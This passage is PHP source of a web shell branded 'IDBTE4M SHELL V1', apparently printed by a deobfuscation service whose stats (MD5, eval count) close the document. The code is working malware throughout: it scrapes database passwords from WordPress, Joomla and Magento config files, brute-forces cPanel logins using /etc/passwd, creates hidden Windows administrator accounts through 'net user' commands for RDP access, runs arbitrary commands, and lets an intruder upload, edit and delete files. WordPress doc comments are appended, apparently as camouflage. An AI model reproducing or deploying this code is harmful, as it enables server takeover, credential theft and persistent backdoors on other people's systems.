                    echo "<span class=f><b>NO<b> " . $count . "  :<a href='$site_url/wp-login.php#".$kontol."@".$ngntd."' target='_blank'>$site_url/wp-login.php</a>|".$kontol."|".$ngntd."<br></span>";
                }else{
                    $anjgtol = $_POST['conflegs'] . "/" . $don;
                    #print_r($don);
                    echo "<span class=f><b>NO<b> " . $count . "  :<a href='$anjgtol' target='_blank'>$don --> ERROR MAKE USER<br></span>";
                }
                $count = $count + 1;
            }else{
                    $anjgtol = $_POST['conflegs'] . "/" . $don;
                    #print_r($don);
                    echo "<span class=f><b>NO<b> " . $count . "  :<a href='$anjgtol' target='_blank'>$don --> ERROR SQL<br></span>";
                }
            }
	}
}
	}else{
			
		}
if($_GET['do'] == 'tolls') {
	if($_POST['crack']) {
		$usercp = explode("\r\n", $_POST['user_cp']);
		$passcp = explode("\r\n", $_POST['pass_cp']);
		$i = 0;
		foreach($usercp as $ucp) {
			foreach($passcp as $pcp) {
				if(@mysqli_connect('localhost', $ucp, $pcp)) {
					if($_SESSION[$ucp] && $_SESSION[$pcp]) {
					} else {
						$_SESSION[$ucp] = "1";
						$_SESSION[$pcp] = "1";
						if($ucp == '' || $pcp == '') {
							
						} else {
							$i++;
							if(function_exists('posix_getpwuid')) {
								$domain_cp = file_get_contents("/etc/named.conf");	
								if($domain_cp == '') {
									$dom =  "<font color=red>gabisa ambil nama domain nya</font>";
								} else {
									preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
									foreach($domains_cp[1] as $dj) {
										$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
										$user_cp_url = $user_cp_url['name'];
										if($user_cp_url == $ucp) {
											$dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
											break;
										}
									}
								}
							} else {
								$dom = "<font color=red>function is Disable by system</font>";
							}
							echo "USA | CPANEL | FRESH AND VALID 100% | http://$dom:2082 | $ucp | $pcp | 6.00<br>";
						}
					}
				}
			}
		}
		if($i == 0) {
		} else {
			echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
		}
	} else {
		echo "<center>
		<form method='post'>
		USER: <br>
		<textarea style='width: 450px; height: 150px;' name='user_cp'>";
		$_usercp = fopen("/etc/passwd","r");
		while($getu = fgets($_usercp)) {
			if($getu == '' || !$_usercp) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all("/(.*?):x:/", $getu, $u);
				foreach($u[1] as $user_cp) {
						if(is_dir("/home/$user_cp/public_html")) {
							echo "$user_cp\n";
					}
				}
			}
		}
		echo "</textarea><br>
		PASS: <br>
		<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
		function cp_pass($asui) {
			$pass = "";
			$dira = scandir($asui);
			foreach($dira as $dirb) {
				if(!is_file("$dir/$dirb")) continue;
				$ambil = file_get_contents("$dir/$dirb");
				if(preg_match("/WordPress/", $ambil)) {
					$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
				} elseif(preg_match("/JConfig|joomla/", $ambil)) {
					$pass .= ambilkata($ambil,"password = '","'")."\n";
				} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
					$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
					$pass .= ambilkata($ambil,'password = "','"')."\n";
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
					$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
				} elseif(preg_match("/^[client]$/", $ambil)) {
					preg_match("/password=(.*?)/", $ambil, $pass1);
					if(preg_match('/"/', $pass1[1])) {
						$pass1[1] = str_replace('"', "", $pass1[1]);
						$pass .= $pass1[1]."\n";
					} else {
						$pass .= $pass1[1]."\n";
					}
				} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
					$pass .= ambilkata($ambil,"db_password = '","'")."\n";
				}
			}
			echo $pass;
		}
		$cp_pass = cp_pass($asui);
		echo $cp_pass;
		echo "</textarea><br>
		<input type='submit' name='crack' style='width: 450px;' value='Crack'>
		</form>
		<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
	}
}
if($_GET['do'] == 'RDP') {
echo '<p>-| Create RDP  |-</p>
<form action="" method="post">User :<input type="text" name="username" required> Pass :<input type="text" name="password" required> <input type="hidden" name="kshell" value="1"><input type="submit" name="submit" value=">>">
</form>
</div>

<center>
<div id="content-center">
<p>-{ Option }-</p>
<form action="" method="post"><input type="text" name="rusername" placeholder="Masukan Username"> <select name="aksi">
						<option value="1">Tampilkan Username</option>
						<option value="2">Hapus Username</option>
						<option value="3">Ubah Password</option>
				</select>
<input type="hidden" name="kshell" value="2">
<input type="submit" name="submit" value=">>"></form>
</div>';
}
if($_POST['submit']){
echo "<p>---------------{ INFO }---------------</p>";	
if($_POST['kshell']=="1"){
	$r_user = $_POST['username'];
	$r_pass = $_POST['password'];
	$cmd_cek_user   = shell_exec("net user"); 
	if(preg_match("/$r_user/", $cmd_cek_user)){
		echo $gaya_root.$r_user." sudah ada".$o;
	}else {
	$cmd_add_user   = shell_exec("net user ".$r_user." ".$r_pass." /add");
    $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
    $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
    $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
        
    	if($cmd_add_user){
    		echo $gaya_root."<p>[add user]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
    	}else {
    		echo $gaya_root."<p>[add user]-> ".$r_user." <font color='red'>Gagal</font><p>".$o;
    	}
    	if($cmd_add_groups1){
              echo $gaya_root."<p>[add localgroup Administrators]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
    	}else
    	if($cmd_add_groups2){
              echo $gaya_root."<p>[add localgroup Administrator]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
    	}else
    	if($cmd_add_groups3){
              echo $gaya_root."<p>[add localgroup Administrateur]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
    	}else {
    		  echo $gaya_root."<p>[add localgroup]-> ".$r_user." <font color='red'>Gagal - Contact Shor7sec</font><p>".$o;
    	}
			  echo $gaya_root."<p>[INFO PC]-> RDP IP ".$_SERVER["HTTP_HOST"]." Username : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil</font><p>".$o;

	}



}else if($_POST['kshell']=="2"){

if($_POST['aksi']=="1"){
 echo "<pre>".shell_exec("net user");
}
else if($_POST['aksi']=="2"){
$username = $_POST['rusername'];
$cmd_cek_user   = shell_exec("net user");
	if (!empty($username)){
		if(preg_match("/$username/", $cmd_cek_user)){
		$cmd_add_user   = shell_exec("net user ".$username." /DELETE");
		if($cmd_add_user){ 
			echo $gaya_root."<p>[remove user]-> ".$username." <font color='greenyellow'>Berhasil</font><p>".$o;
		}else {
			echo $gaya_root."<p>[remove user]-> ".$username." <font color='red'>gagal</font><p>".$o;
		}
	}else {
		echo $gaya_root."<p>[remove user]-> ".$username." <font color='red'>Tidak ditemukan</font><p>".$o;
	}
	}else {
		echo $gaya_root."<p>[PESAN]-> <font color='red'>Kamu lupa masukin Username yang akan di delete</font><p>".$o;
	}
}else if($_POST['aksi']=="3"){
$username = $_POST['rusername'];
$password = "jancok";
$cmd_cek_user   = shell_exec("net user");
	if (!empty($username)){
		if(preg_match("/$username/", $cmd_cek_user)){
			$cmd_add_user   = shell_exec("net user ".$username." jancok");
			if($cmd_add_user){
			echo $gaya_root."<p>[change password]-> (".$username."|".$password.") <font color='greenyellow'>Berhasil</font><p>".$o;
		}else {
			echo $gaya_root."<p>[change password]-> (".$username."|".$password.") <font color='red'>GAGAL</font><p>".$o;
		}
	}else
{
	echo $gaya_root."<p>[PESAN]-> <font color='red'>Username Tidak Ditemukan di server</font><p>".$o;
}
}else
{
	echo $gaya_root."<p>[PESAN]-> <font color='red'>Kamu lupa masukin Username yang akan di delete</font><p>".$o;
}
		
}

}

}
?>

<?php 


		
@ini_set('log_errors',0);
@ini_set('output_buffering',0);
set_time_limit(0);
error_reporting(0);
if(get_magic_quotes_gpc()){
    foreach($_POST as $key=>$value){
        $_POST[$key] = stripslashes($value);
    }
}
echo '<html><head>
<title>-_-</title>
<meta http-equiv="Content-Type" content="jpg/png; charset=utf-8"><div class="gmail_extra"><br>
<link rel="SHORTCUT ICON" href="http://goenk.wapgem.com/idb.png">
<body>
<style type="text/css">
	body {
    background: black;
    color: #00FF00;
    font-family: monospace;
}

.accessGranted {
    position: absolute;
    top: 200px;
    background: #333;
    padding: 20px;
    border: 1px solid #999;
    width: 300px;
    left: 50%;
    margin-left: -150px;
    text-align: center;
}

.accessDenied {
    position: absolute;
    top: 200px;
    color: #F00;
    background: #511;
    padding: 20px;
    border: 1px solid #F00;
    width: 300px;
    left: 50%;
    margin-left: -150px;
    text-align: center;
}
#content-center {
    width: 400px;
    padding: 0px 10px 10px 10px;
    width: 800px; 
    margin: 0 auto;
}
#content-left {
margin: 0 auto;
     text-align: left;
}
#content-right {
margin: 0 auto;
     text-align: right;
}
input,select,textarea{
    border:0;
    border:1px solid #900;
    background:black;
    margin:0;
        color: white;

    padding:2px 4px;
}
input:hover,textarea:hover,select:hover{
    background:black;
        color: blue;

    border:1px solid #f00;
}
                        a{ text-decoration:none; color:red;}
</style>
</head>
<H1><center>-=[+] IDBTE4M SHELL V1 [+]=-</center></H1>
<table width="900" border="0" cellpadding="3" cellspacing="1" align="center">
';
echo '<font color="aqua"><center>'.php_uname().'</center></font><br>';
echo '<tr><td>
<center>
<div id="content-center">
<form method="post">
<input type="text" name="cmd" size="30"><input type="submit" value="Command">
</form>
<br>
[ <a href="?"><font color="aqua">Home</font></a> ]-[ <a href="?do=wpm"><font color="aqua">Wp Mass</font></a> ]-[ <a href="?do=jumping"><font color="aqua">Jumping</font></a> ]-[ <a href="?do=mass_deface"><font color="aqua">Mass Deface</font></a> ]-[ <a href="?do=RDP"><font color="aqua">KRDP</font></a> ]-[ <a href="?do=config"><font color="aqua">Config Grab</font></a> ]-[ <a href="?do=tolls"><font color="aqua">Cp</font></a> ]

<br><br>';
echo 'IDBTE4M #> ';
if(isset($_GET['path'])){
    $path = $_GET['path'];   
}else{
    $path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
    if($pat == '' && $id == 0){
        $a = true;
        echo '<a href="?path=/">/</a>';
        continue;
    }
    if($pat == '') continue;
    echo '<a href="?path=';
    for($i=0;$i<=$id;$i++){
        echo "$paths[$i]";
        if($i != $id) echo "/";
    }
    echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
        echo '<font color="green">OK COK SUKSESS !!</font><br />';
    }else{
        echo '<font color="red">ASU RAIMU ELK :P</font><br />';
    }
}
echo '<center>
<form enctype="multipart/form-data" method="POST">
<input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
    echo "<tr><td>Current File : ";
    echo $_GET['filesrc'];
    echo '</tr></td></table><br />';
    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
    if($_POST['opt'] == 'chmod'){
        if(isset($_POST['perm'])){
            if(chmod($_POST['path'],$_POST['perm'])){
                echo '<font color="green">Change Permission Done.</font><br />';
            }else{
                echo '<font color="red">Change Permission Error.</font><br />';
            }
        }
        echo '<form method="POST">
        Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="chmod">
        <input type="submit" value="Go" />
        </form>';
    }elseif($_POST['opt'] == 'rename'){
        if(isset($_POST['newname'])){
            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
                echo '<font color="green">Change Name Done.</font><br />';
            }else{
                echo '<font color="red">Change Name Error.</font><br />';
            }
            $_POST['name'] = $_POST['newname'];
        }
        echo '<form method="POST">
        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="rename">
        <input type="submit" value="Go" />
        </form>';
    }elseif($_POST['opt'] == 'edit'){
        if(isset($_POST['src'])){
            $fp = fopen($_POST['path'],'w');
            if(fwrite($fp,$_POST['src'])){
                echo '<font color="green">Edit File Done.</font><br />';
            }else{
                echo '<font color="red">Edit File Error.</font><br />';
            }
            fclose($fp);
        }
        echo '<form method="POST">
        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="edit">
        <input type="submit" value="Go" />
        </form>';
    }
    echo '</center>';
}else{
    echo '</table><br /><center>';
    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
        if($_POST['type'] == 'dir'){
            if(rmdir($_POST['path'])){
                echo '<font color="green">Delete Dir Done.</font><br />';
            }else{
                echo '<font color="red">Delete Dir Error.</font><br />';
            }
        }elseif($_POST['type'] == 'file'){
            if(unlink($_POST['path'])){
                echo '<font color="green">Delete File Done.</font><br />';
            }else{
                echo '<font color="red">Delete File Error.</font><br />';
            }
        }
    }
    echo '</center>';
    $scandir = scandir($path);
    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
    <tr class="first">
        <td><center>Name</center></td>
        <td><center>Size</center></td>
        <td><center>Permissions</center></td>
        <td><center>Options</center></td>
    </tr>';

    foreach($scandir as $dir){
        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
        echo "<tr>
        <td><a href=\"?path=$path/$dir\">$dir</a></td>
        <td><center>--</center></td>
        <td><center>";
        if(is_writable("$path/$dir")) echo '<font color="aqua">';
        elseif(!is_readable("$path/$dir")) echo '<font color="red">';
        echo perms("$path/$dir");
        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
        
        echo "</center></td>
        <td><center><form method=\"POST\" action=\"?option&path=$path\">
        <select name=\"opt\">
	    <option value=\"\"></option>
        <option value=\"delete\">Delete</option>
        <option value=\"chmod\">Chmod</option>
        <option value=\"rename\">Rename</option>
        </select>
        <input type=\"hidden\" name=\"type\" value=\"dir\">
        <input type=\"hidden\" name=\"name\" value=\"$dir\">
        <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
        <input type=\"submit\" value=\">\" />
        </form></center></td>
        </tr>";
    }
    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
    foreach($scandir as $file){
        if(!is_file("$path/$file")) continue;
        $size = filesize("$path/$file")/1024;
        $size = round($size,3);
        if($size >= 1024){
            $size = round($size/1024,2).' MB';
        }else{
            $size = $size.' KB';
        }

        echo "<tr>
        <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
        <td><center>".$size."</center></td>
        <td><center>";
        if(is_writable("$path/$file")) echo '<font color="aqua">';
        elseif(!is_readable("$path/$file")) echo '<font color="red">';
        echo perms("$path/$file");
        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
        echo "</center></td>
        <td><center><form method=\"POST\" action=\"?option&path=$path\">
        <select name=\"opt\">
	    <option value=\"\"></option>
        <option value=\"delete\">Delete</option>
        <option value=\"chmod\">Chmod</option>
        <option value=\"rename\">Rename</option>
        <option value=\"edit\">Edit</option>
        </select>
        <input type=\"hidden\" name=\"type\" value=\"file\">
        <input type=\"hidden\" name=\"name\" value=\"$file\">
        <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
        <input type=\"submit\" value=\">\" />
        </form></center></td>
        </tr>";
    }
    echo '</table>
    </div>';
}
echo '
</BODY>
</HTML>';
function perms($file){
    $perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = 'p';
} else {
    // Unknown
    $info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));

    return $info;
}
?>");exit;
 /**
 * Whether this is an XML-RPC Request
 *
 * @var bool
  * Used to set up and fix common variables and include
 * the WordPress procedural and class library.
 *
 * Allows for some configuration in wp-config.php (see default-constants.php)
 *
 * @package WordPress
 */

/**
 * Stores the location of the WordPress directory of functions, classes, and core content.
 *
 * @since 1.0.0
 * Outputs the OPML XML format for getting the links defined in the link
 * administration. This can be used to export links from one blog over to
 * another. Links aren't exported by the WordPress export, so this file handles
 * that.
 *
 * This file is not added by default to WordPress theme pages when outputting
 * feed links. It will have to be added manually for browsers and users to pick
 * up that this file exists.
 *
 * @package WordPress
 *//**
 * Whether this is an XML-RPC Request
 *
 * @var bool
  * Used to set up and fix common variables and include
 * the WordPress procedural and class library.
 *
 * Allows for some configuration in wp-config.php (see default-constants.php)
 *
 * @package WordPress
 */

/**
 * Stores the location of the WordPress directory of functions, classes, and core content.
 *
 * @since 1.0.0
 * Outputs the OPML XML format for getting the links defined in the link
 * administration. This can be used to export links from one blog over to
 * another. Links aren't exported by the WordPress export, so this file handles
 * that.
 *
 * This file is not added by default to WordPress theme pages when outputting
 * feed links. It will have to be added manually for browsers and users to pick
 * up that this file exists.
 *
 * @package WordPress
 *//**
 * Whether this is an XML-RPC Request
 *
 * @var bool
  * Used to set up and fix common variables and include
 * the WordPress procedural and class library.
 *
 * Allows for some configuration in wp-config.php (see default-constants.php)
 *
 * @package WordPress
 */

/**
 * Stores the location of the WordPress directory of functions, classes, and core content.
 *
 * @since 1.0.0
 * Outputs the OPML XML format for getting the links defined in the link
 * administration. This can be used to export links from one blog over to
 * another. Links aren't exported by the WordPress export, so this file handles
 * that.
 *
 * This file is not added by default to WordPress theme pages when outputting
 * feed links. It will have to be added manually for browsers and users to pick
 * up that this file exists.
 *
 * @package WordPress
 */
 ?>

Function Calls

ini_set 3
clearstatcache 1
set_time_limit 1
create_function 1
error_reporting 1

Variables

$settings create_function

Stats

MD5 744eda9579dde90d9d76cb517b15e108
Eval Count 1
Decode Time 496 ms